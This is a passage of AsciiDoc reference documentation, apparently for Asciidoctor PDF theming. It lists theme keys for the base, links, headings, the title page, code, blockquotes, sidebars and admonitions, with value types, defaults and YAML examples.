key\n\/\/|border-radius\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|base:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: #000000)\n|base:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Helvetica)\n|base:\n font-family: Noto Serif\n\n|font-kerning\n|normal {vbar} default +\n(default: normal)\n|base:\n font-kerning: none\n\n|font-size\n|<<values,Number>> +\n(default: 12)\n|base:\n font-size: 10.5\n\n\/\/ font-size-large is a variable, not an official key\n\/\/|font-size-large\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font-size-large: 13\n\n|font-size-min\n|<<values,Number>> +\n(default: 9)\n|base:\n font-size-min: 6\n\n\/\/ font-size-small is a variable, not an official key\n\/\/|font-size-small\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font-size-small: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: normal)\n|base:\n font-style: normal\n\n|text-transform^[1]^\n|none +\n(default: none)\n|base:\n text-transform: none\n\n|line-height-length^[2]^\n|<<values,Number>> +\n(default: _not set_)\n|base:\n line-height-length: 12\n\n|line-height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|base:\n line-height: >\n $base-line-height-length \/\n $base-font-size\n|===\n\n. The `text-transform` key cannot be set globally.\nTherefore, this key should not be used.\nThe value of `none` is implicit and is documented here for completeness.\n. The `line-height-length` is a pseudo property that's local the theme.\nIt's often used for computing the `base-line-height` from the base font size and the desired line height size.\nFor instance, if you set `base-line-height-length`, you can use `$base-line-height-length \/ $base-font-size` to set the value of `base-line-height`.\n\n[#keys-vertical-spacing]\n=== Vertical Spacing\n\nThe keys in this category control the general spacing between elements where a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|vertical-spacing\n|<<values,Number>> +\n(default: 12)\n|vertical-spacing: 10\n|===\n\n[#keys-link]\n=== Link\n\nThe keys in this category are used to style hyperlink text.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>\n\n|font-color\n|<<colors,Color>> +\n(default: #0000ee)\n|link:\n font-color: #428bca\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|link:\n font-family: Roboto\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|link:\n font-size: 9\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|link:\n font-style: italic\n\n|text-decoration\n|none {vbar} underline {vbar} line-through +\n(default: none)\n|link:\n text-decoration: underline\n|===\n\n[#keys-literal]\n=== (Inline) Literal\n\nThe keys in this category are used for inline monospaced text in prose and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|literal:\n background-color: #f5f5f5\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|literal:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|literal:\n border-offset: 2\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|literal:\n border-radius: 3\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|literal:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|literal:\n font-color: #b12146\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|literal:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|literal:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|literal:\n font-style: bold\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\nThe border only works properly if the literal phrase does not have nested formatting.\nOtherwise, the border will be inherited, producing a less than desirable result.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n\n[#keys-heading]\n=== Heading\n\nThe keys in this category control the style of most headings, including part titles, chapter titles, sections titles, the table of contents title and discrete headings.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $base-align)\n|heading:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|heading:\n font-color: #222222\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $base-font-family)\n|heading:\n font-family: Noto Serif\n\n\/\/ NOTE: heading-font-size is overridden by h<n>-font-size in base theme\n\/\/|font-size\n\/\/|<<values,Number>> +\n\/\/(default: $base-font-size)\n\/\/|heading:\n\/\/ font-size: 18\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|heading:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|heading:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.15)\n|heading:\n line-height: 1.2\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 4)\n|heading:\n margin-top: $vertical-spacing * 0.2\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|heading:\n margin-bottom: 9.6\n\n3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading-h<n> >>^[1]^\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading-align)\n|heading:\n h2-align: center\n\n|font-color\n|<<colors,Color>> +\n(default: $heading-font-color)\n|heading:\n h2-font-color: [0, 99%, 100%, 0]\n\n|font-family\n|<<fonts,Font family name>> +\n(default: $heading-font-family)\n|heading:\n h4-font-family: Roboto\n\n|font-size^[1]^\n|<<values,Number>> +\n(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)\n|heading:\n h6-font-size: $base-font-size * 1.7\n\n|font-style\n|<<font-styles,Font style>> +\n(default: $heading-font-style)\n|heading:\n h3-font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: $heading-text-transform)\n|heading:\n text-transform: lowercase\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. A font size is assigned to each heading level by the base theme.\nIf you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).\n\n[#keys-title-page]\n=== Title Page\n\nThe keys in this category control the style of the title page as well as the arrangement and style of the elements on it.\n\nTIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title-page>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|title-page:\n align: right\n\n|background-color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n background-color: #eaeaea\n\n|background-image^[2]^\n|image macro^[3]^ +\n(default: _not set_)\n|title-page:\n background-image: image:title.png[]\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: 1.15)\n|title-page:\n line-height: 1\n\n3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title-page-logo>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: _inherit_)\n|title-page:\n logo:\n align: right\n\n|image\n|image macro^[3]^ +\n(default: _not set_)\n|title-page:\n logo:\n image: image:logo.png[pdfwidth=25%]\n\n|top\n|Percentage^[4]^ +\n(default: 10%)\n|title-page:\n logo:\n top: 25%\n\n3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title-page-title>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n title:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: 18)\n|title-page:\n title:\n font-size: $heading-h1-font-size\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n title:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: $heading-line-height)\n|title-page:\n title:\n line-height: 0.9\n\n|top\n|Percentage^[3]^ +\n(default: 40%)\n|title-page:\n title:\n top: 55%\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n title:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n title:\n margin-bottom: 5\n\n3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title-page-subtitle>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: 14)\n|title-page:\n subtitle:\n font-size: $heading-h3-font-size\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n subtitle:\n text-transform: uppercase\n\n|line-height\n|<<values,Number>> +\n(default: $heading-line-height)\n|title-page:\n subtitle:\n line-height: 1\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n subtitle:\n margin-bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title-page-authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n authors:\n delimiter: '; '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n authors:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n authors:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title-page:\n authors:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n authors:\n margin-bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title-page-revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title-page:\n revision:\n delimiter: ': '\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-color: #181818\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-size: $base-font-size-small\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title-page:\n revision:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title-page:\n revision:\n text-transform: uppercase\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-top: 13.125\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title-page:\n revision:\n margin-bottom: 5\n|===\n\n. To disable the background color for the title page, set the value to white (i.e., FFFFFF).\nThe color keyword `transparent` is not recognized in this context.\n. By default, page background images are automatically scaled to fit the bounds of the page (i.e., `fit=contain`) and centered (i.e., `position=center`).\nThe size of the background image can be controlled using any of the sizing attributes on the image macro (i.e., fit, pdfwidth, scaledwidth, or width).\nThe position of the background image can be controlled using the `position` attribute.\n. Target may be an absolute path or a path relative to the value of the `pdf-themesdir` attribute.\n. Percentage unit can be % (relative to content height) or vh (relative to page height).\n\n[#keys-prose]\n=== Prose\n\nThe keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).\nTypically, all the margin is placed on the bottom.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|prose:\n margin-top: 0\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|prose:\n margin-bottom: $vertical-spacing\n\n|margin-inner^[1]^\n|<<measurement-units,Measurement>> +\n(default: $prose-margin-bottom)\n|prose:\n margin-inner: 0\n\n|text-indent\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|prose:\n text-indent: 18\n|===\n\n. Controls the margin between adjacent paragraphs.\nUseful when using indented paragraphs.\n\n[#keys-block]\n=== Block\n\nThe keys in this category control the spacing around block elements when a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>\n\n\/\/|padding\n\/\/|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n\/\/|block:\n\/\/ padding: [12, 15, 12, 15]\n\n|margin-top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|block:\n margin-top: 6\n\n|margin-bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|block:\n margin-bottom: 6\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"3*a\",grid=none,frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n[#keys-caption]\n=== Caption\n\nThe keys in this category control the arrangement and style of block captions.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|caption:\n align: left\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|caption:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|caption:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|caption:\n font-size: 11\n\n|font-style\n|<<font-styles,Font style>> +\n(default: italic)\n|caption:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|caption:\n text-transform: uppercase\n\n|margin-inside\n|<<measurement-units,Measurement>> +\n(default: 4)\n|caption:\n margin-inside: 3\n\n|margin-outside\n|<<measurement-units,Measurement>> +\n(default: 0)\n|caption:\n margin-outside: 0\n|===\n\n[#keys-code]\n=== Code\n\nThe keys in this category are used to control the style of literal, listing and source blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|code:\n background-color: #f5f5f5\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|code:\n border-color: #cccccc\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|code:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|code:\n border-width: 0.75\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|code:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|code:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: 10.8)\n|code:\n font-size: 11\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|code:\n font-style: italic\n\n|line-height\n|<<values,Number>> +\n(default: 1.2)\n|code:\n line-height: 1.25\n\n|line-gap^[1]^\n|<<values,Number>> +\n(default: 0)\n|code:\n line-gap: 3.8\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 9)\n|code:\n padding: 11\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-code-linenum,code-linenum>>^[2]^\n\n|font-color\n|<<colors,Color>> +\n(default: #999999)\n|code:\n linenum-font-color: #ccc\n|===\n. The line-gap property is used to tune the height of the background color applied to a span of block text highlighted using Rouge.\n. The code-linenum category only applies when using Pygments as the source highlighter.\nOtherwise, the style is controlled by the source highlighter theme.\n\n[#keys-callout-numbers]\n=== Callout Numbers\n\nThe keys in this category are used to control the style of callout numbers (i.e., conums) inside verbatim blocks and in callout lists (colists).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|conum:\n font-color: #b12146\n\n|font-family^[1,2]^\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|conum:\n font-family: M+ 1mn\n\n|font-size^[2]^\n|<<values,Number>> +\n(default: _inherit_)\n|conum:\n font-size: $base-font-size\n\n|font-style^[2]^\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|conum:\n font-style: normal\n\n|line-height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|conum:\n line-height: 4 \/ 3\n\n|glyphs^[2]^\n|circled {vbar} filled {vbar} Unicode String ranges +\n(default: circled)\n|conum:\n glyphs: \\u0031-\\u0039\n|===\n\n. Currently, the font must contain the circle numbers starting at glyph U+2460.\n. font-family, font-size, font-style, and line-height are only used for markers in a colist.\nThese properties are inherited for conums inside a verbatim block.\n. The font must provide the required glyphs.\nThe glyphs can be specified as a comma-separated list of ranges, where the range values are Unicode numbers (e.g., \\u2460).\n\n[#keys-button]\n=== Button\n\nThe keys in this category apply to a button reference (generated from the inline button macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-button]*Key Prefix:* <<key-prefix-button,button>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|button:\n background-color: #0000ff\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|button:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|button:\n border-offset: 1.5\n\n|border-radius\n|<<values,Number>> +\n(default: 0)\n|button:\n border-radius: 2\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|button:\n border-width: 0.5\n\n|content^[3]^\n|<<quoted-string,Quoted string>> +\n(default: \"%s\")\n|button:\n content: \"[\\u2009%s\\u2009]\"\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|button:\n font-color: #ffffff\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|button:\n font-family: M+ 1mn\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|button:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|button:\n font-style: normal\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n. The character sequence `%s` in the content key gets replaced with the button label.\n\n[#keys-key]\n=== Key\n\nThe keys in this category apply to a key reference (generated from the inline kbd macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-key]*Key Prefix:* <<key-prefix-key,key>>\n\n|background-color\n|<<colors,Color>> +\n(default: _not set_)\n|key:\n background-color: #fafafa\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: _not set_)\n|key:\n border-color: #cccccc\n\n|border-offset^[2]^\n|<<values,Number>> +\n(default: 0)\n|key:\n border-offset: 1.5\n\n|border-radius\n|<<values,Number>> +\n(default: 0)\n|key:\n border-radius: 2\n\n|border-width\n|<<values,Number>> +\n(default: $base-border-width)\n|key:\n border-width: 0.375\n\n|separator^[3]^\n|<<quoted-string,Quoted string>> +\n(default: \"+\")\n|key:\n separator: \"\\u2009+\\u2009\"\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|key:\n font-color: #000\n\n|font-family\n|<<fonts,Font family name>> +\n(default: Courier)\n|key:\n font-family: $base-font-family\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|key:\n font-size: 10.5\n\n|font-style\n|<<font-styles,Font style>> +\n(default: italic)\n|key:\n font-style: normal\n|===\n. The border is only used if a border color is specified and the border width is not explicitly set to 0.\n. The border offset is the amount that the background and border swells around the text.\nIt does not affect the distance between the formatted phrase and the phrases that surround it.\n. The separator is only used for multi-key sequences.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret-content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret-content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border-width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border-width: 5\n\n|border-color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border-color: #eeeeee\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote-cite>>\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-size: 9\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-family: Noto Serif\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text-transform: uppercase\n|===\n\n. Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background-color: #eeeeee\n\n|border-color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border-color: #ffffff\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar-title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-color: #333333\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-family: Noto Serif\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font-style: bold\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text-transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background-color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background-color: #fffef7\n\n|border-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border-color: #eeeeee\n\n|border-radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border-radius: 4\n\n|border-width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border-width: 0.75\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font-size: 13\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text-transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column-rule-color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column-rule-color: #aa0000\n\n|column-rule-style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column-rule-style: double\n\n|column-rule-width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column-rule-width: 0.5\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font-color: #999999\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font-family: Noto Sans\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font-size: $base-font-size-large\n\n|font-style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font-style: italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text-transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition-label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min-width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min-width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition-padding)\n|admonition:\n padding: [0, 12, 0, 12]\n\n|vertical-align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical-align: top\n\n3+|*Key Prefix:* admonition-label, admonition-label-<name>^[2]^\n\n|font-color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font-color: #262626\n\n|font-family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font-family: M+ 1p\n\n|font-size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font-size: 12\n\n|font-style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font-style: bold_italic\n\n|text-transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text-transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition-icon-<name> 